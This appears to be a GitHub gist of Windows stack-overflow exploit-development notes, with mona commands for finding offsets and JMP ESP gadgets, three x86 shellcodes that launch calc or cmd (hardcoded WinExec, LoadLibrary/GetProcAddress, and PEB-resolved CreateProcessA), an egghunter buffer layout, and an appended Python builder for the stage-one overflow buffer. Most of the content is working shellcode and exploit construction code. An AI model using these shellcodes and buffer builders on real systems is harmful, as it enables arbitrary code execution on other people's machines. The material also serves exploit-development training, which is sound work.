Last active: February 22, 2021 10:06
Gist: adon90/19af7b7172e1fea600f01a7b2487bfba
Exploiting Tricks
Mona tricks:
---------------
!mona pc 1000                         -> create a 1000-byte cyclic pattern; send it as the payload and let the target crash
!mona findmsp                         -> after the crash: offset of the pattern in EIP, how many pattern bytes sit at ESP, which registers point into it, etc.
No JMP ESP in an executable section (.text) but DEP is off:
!mona asm -s "jmp esp"                -> assemble the instruction to get its opcode: \xff\xe4
!mona find -s "\xff\xe4" -m <module>  -> search those two bytes anywhere in <module>; with DEP off a hit in a non-executable section (data, .rdata) still executes, so it works as a return address
-----------------
SHELLCODES
1. WinExec with a hardcoded address
arwin kernel32 WinExec        -> prints the address of WinExec in this kernel32 build (no ASLR before Vista, so it is stable for that exact build/locale only; run arwin again for another target)
--------------------------
shellcode = ("\x33\xc0"                 # xor eax, eax
             "\x50"                     # push eax             ; NUL terminator for the string
             "\x68\x2E\x65\x78\x65"     # push ".exe"
             "\x68\x63\x61\x6C\x63"     # push "calc"          ; esp -> "calc.exe"
             "\x8B\xC4"                 # mov eax, esp         ; eax = lpCmdLine
             "\x6A\x01"                 # push 1               ; uCmdShow = SW_SHOWNORMAL
             "\x50"                     # push eax             ; lpCmdLine
             "\xBB\xED\x2A\x86\x7C"     # mov ebx, 0x7c862aed  ; WinExec address printed by arwin
             "\xFF\xD3")                # call ebx             ; WinExec("calc.exe", 1)
-------------------------------------
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://github.com/73696e65/windows-exploits/blob/master/arwin.exe
2. GetProcAddress + LoadLibraryA (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))
Find the import-table pointers (.rdata) to GetProcAddress and LoadLibraryA in the target binary, starting from its entry point: right-click > Search for > Name in all modules.
Take the address of each pointer from Follow in Dump and call through it (call dword ptr [ptr]), so the shellcode depends on the target's IAT instead of on a kernel32 address.
------------------------------------------------
shellcode  = "\x31\xC9"                 # xor ecx, ecx
shellcode += "\x51"                     # push ecx             ; NUL terminator
shellcode += "\x68\x2e\x64\x6c\x6c"     # push ".dll"
shellcode += "\x68\x65\x6c\x33\x32"     # push "el32"
shellcode += "\x68\x6b\x65\x72\x6e"     # push "kern"          ; esp -> "kernel32.dll"
shellcode += "\x54"                     # push esp             ; lpLibFileName
shellcode += "\xff\x15\x7b\x1d\x80\x7c" # call dword ptr [0x7c801d7b]  ; *LoadLibraryA (operand = address of the IAT slot, see note) ; eax = HMODULE kernel32
shellcode += "\xba\x78\x65\x63\x20"     # mov edx, "xec "      ; build "xec\0" without a NUL byte in the code:
shellcode += "\xc1\xea\x08"             # shr edx, 8           ; edx = "xec\0"
shellcode += "\x52"                     # push edx
shellcode += "\x68\x57\x69\x6e\x45"     # push "WinE"          ; esp -> "WinExec"
shellcode += "\x54"                     # push esp             ; lpProcName
shellcode += "\x50"                     # push eax             ; hModule (return value of LoadLibraryA)
shellcode += "\xff\x15\x40\xae\x80\x7c" # call dword ptr [0x7c80ae40]  ; *GetProcAddress (operand = address of the IAT slot, see note) ; eax = WinExec
shellcode += "\x31\xC9"                 # xor ecx, ecx
shellcode += "\x51"                     # push ecx             ; NUL terminator
shellcode += "\x68\x2e\x65\x78\x65"     # push ".exe"
shellcode += "\x68\x63\x61\x6c\x63"     # push "calc"          ; esp -> "calc.exe"
shellcode += "\x89\xe1"                 # mov ecx, esp         ; ecx = lpCmdLine
shellcode += "\x6a\x01"                 # push 1               ; uCmdShow = SW_SHOWNORMAL
shellcode += "\x51"                     # push ecx             ; lpCmdLine
shellcode += "\xff\xd0"                 # call eax             ; eax holds GetProcAddress's return value: WinExec("calc.exe", 1)
Note on the two call dword ptr [...] lines: ff 15 dereferences its operand, so the operand must be the address of the .rdata/IAT slot that holds the function pointer, not the function's own address. 0x7c801d7b and 0x7c80ae40 are the well-known XP SP3 addresses of LoadLibraryA and GetProcAddress themselves; if you hardcode function addresses like that instead of IAT slots, call them directly (\xbb<addr>\xff\xd3, i.e. mov ebx, addr / call ebx, as in shellcode 1). "WinExec" is built with mov edx, "xec " / shr edx, 8 because a plain push "xec " leaves "WinExec kernel32.dll" on the stack and GetProcAddress would return 0; uCmdShow is pushed explicitly so WinExec does not pick up a stray dword ("calc") as its second argument.
------------------------------------------------------
3. API resolved at run time from the PEB (null-free, no hardcoded addresses)
This variant resolves CreateProcessA rather than WinExec; the govolution tool linked below generates the WinExec equivalent.
----------------------------------------------------------
# fs:[0x30] = PEB -> Ldr -> InInitializationOrderModuleList; loop until the entry whose
# BaseDllName has '3' as its 7th character (kernel32.dll) and take its DllBase.
# Parse its export directory (AddressOfNames / AddressOfNameOrdinals / AddressOfFunctions)
# for the name that starts "Crea" and has "oces" at offset 8 -> CreateProcessA in edi.
# Push 255 zero dwords (a zeroed area for STARTUPINFO / PROCESS_INFORMATION that also
# terminates the command line), push the command line, then
# CreateProcessA(NULL, "cmd ", 0, 0, 0, 0, 0, 0, edx, edx) via call edi.
shellcode =("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
            "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
            "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
            "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
            "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
            "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
            "\x45\x81\x3e\x43\x72\x65\x61\x75"
            "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
            "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
            "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
            "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
            "\xb1\xff\x53\xe2\xfd"
            "\x68\x63\x6d\x64\x20" # command line: push "cmd " (trailing space pads it to 4 bytes; any 4-byte-padded command works, e.g. "calc")
            "\x89\xe2\x52\x52\x53\x53"
            "\x53\x53\x53\x53\x52\x53\xff\xd7") # mov edx, esp ; push the 10 CreateProcessA arguments ; call edi
---------------------------------------------------------
https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/
Egghunter
------------
Stage 1 layout (hunter = the egghunter bytes from !mona egg -t w00t, nops = a NOP sled, jmp_esp = the packed JMP ESP address found with mona, placed at the EIP offset, here 510):
evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF"
\xE9\xC0\xFF\xFF\xFF is JMP rel32 with displacement -0x40: after the JMP ESP lands on it, execution jumps 64 bytes back (counted from the end of the instruction) into the NOP sled in front of the hunter and slides into it. With a 45-byte sled the pieces before jmp_esp add up to exactly 510 bytes.
Important: put NOPs between the hunter and the JMP ESP address.
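Added example (not part of the gist): a Python 3 layout check for the stage-1 buffer above. It builds filler | sled | hunter | gap NOPs | JMP ESP address | jmp back, then computes where the E9 jump actually lands and verifies that the landing point falls inside the sled, which is the condition the one-line formula relies on but never checks. The gist's numbers (return address at offset 510, 5 NOPs after the hunter) are the defaults, so the 50 in the original formula corresponds to a 45-byte sled. Assumptions: a plain return-address overwrite (after the ret, ESP points at the byte following the overwritten address), the classic 32-byte NtAccessCheckAndAuditAlarm egghunter with tag w00t embedded here so the check runs offline, and a placeholder JMP ESP address 0x41414141 that you replace with a mona result.

```python
import struct

# Classic 32-byte egghunter (NtAccessCheckAndAuditAlarm, tag "w00t"), embedded here
# so the layout check runs offline; use the bytes mona prints for your own tag.
HUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
          b"\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

JMP_BACK = b"\xe9\xc0\xff\xff\xff"   # jmp rel32, displacement -0x40 (64 bytes back)


def jmp_rel32_target(instr_offset, instr):
    """Buffer offset a 5-byte E9 near jump at instr_offset transfers to.

    rel32 is relative to the end of the instruction, i.e. instr_offset + 5.
    """
    if len(instr) != 5 or instr[0] != 0xE9:
        raise ValueError("not a 5-byte E9 jmp rel32")
    disp = struct.unpack("<i", instr[1:])[0]
    return instr_offset + 5 + disp


def build_stage1(ret_offset, jmp_esp, hunter=HUNTER, sled_len=45, gap=5, jmp_back=JMP_BACK):
    """filler | NOP sled | hunter | gap NOPs | JMP ESP address | jmp back into the sled.

    Returns the buffer and a dict describing where the backward jump lands.
    """
    filler_len = ret_offset - sled_len - len(hunter) - gap
    if filler_len < 0:
        raise ValueError("sled + hunter + gap do not fit before the return address")
    buf = (b"A" * filler_len + b"\x90" * sled_len + hunter
           + b"\x90" * gap + jmp_esp + jmp_back)
    sled_start = filler_len
    hunter_start = sled_start + sled_len
    # After the overwritten return address is popped, ESP points right behind it,
    # so JMP ESP executes jmp_back at ret_offset + 4.
    landing = jmp_rel32_target(ret_offset + 4, jmp_back)
    info = {
        "sled_start": sled_start,
        "hunter_start": hunter_start,
        "landing": landing,
        "lands_in_sled": sled_start <= landing < hunter_start,
    }
    return buf, info


def egg(tag, stage2, hunter=HUNTER):
    """Stage 2: the tag twice, then the real payload; the hunter jumps to the byte after the second tag."""
    if tag not in hunter:
        raise ValueError("hunter does not search for this tag")
    return tag * 2 + stage2


if __name__ == "__main__":
    jmp_esp = struct.pack("<I", 0x41414141)   # placeholder: replace with a !mona find result
    buf, info = build_stage1(510, jmp_esp)
    print(len(buf), info)
    if not info["lands_in_sled"]:
        print("jmp back misses the sled: enlarge nops or shrink the gap")
```

Running it with the page's numbers reports landing at offset 455, 18 bytes in front of the hunter (offset 473) and inside the 45-byte sled; shrinking the sled to 10 bytes makes lands_in_sled False, which is the failure mode the NOP placement guards against.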